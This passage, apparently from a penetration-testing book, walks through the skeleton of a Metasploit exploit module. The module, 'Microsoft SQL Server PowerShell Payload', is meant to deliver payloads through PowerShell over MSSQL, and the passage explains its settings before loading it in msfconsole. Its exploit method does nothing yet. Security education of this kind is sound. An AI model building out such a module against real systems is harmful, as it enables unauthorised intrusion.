Chapter 13
  def initialize(info = {}) # initialize the basic template
    super(update_info(info,
      'Name' => 'Microsoft SQL Server PowerShell Payload',
      'Description' => %q{
        This module will deliver our payload through Microsoft PowerShell
        using MSSQL based attack vectors.
      },
      'Author' => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>'],
      'License' => MSF_LICENSE,
      'Version' => '$Revision: 8771 $',
      'References' =>
        [
          [ 'URL', 'http://www.secmaniac.com' ]
        ],
      'Platform' => 'win', # target only windows
      'Targets' =>
        [
          [ 'Automatic', { } ], # automatic targeting
        ],
      'DefaultTarget' => 0
    ))
    register_options( # register options for the user to pick from
      [
        OptBool.new('UsePowerShell', [ false, "Use PowerShell as payload delivery method instead", true ]), # default to PowerShell
      ])
  end

  def exploit # define our exploit here; it does nothing at this point
    handler # call the Metasploit handler
    disconnect # after handler disconnect
  end
end
Before this exploit will work properly, you’ll need to define some basic
settings. Notice that the name, description, licensing, and references are
defined in the update_info block. We also define a platform ('Platform' =>
'win', Windows) and a target ('Automatic', all operating systems). We also
define a new parameter called UsePowerShell in register_options for use in
the body of the exploit. Lastly, a handler is specified in the exploit
method to handle the connections between the attacker and the exploited
target.
Running the Shell Exploit
With the skeleton of the exploit built, we run it through msfconsole to see
what options are available:

msf > use windows/mssql/mssql_powershell
msf exploit(mssql_powershell) > show options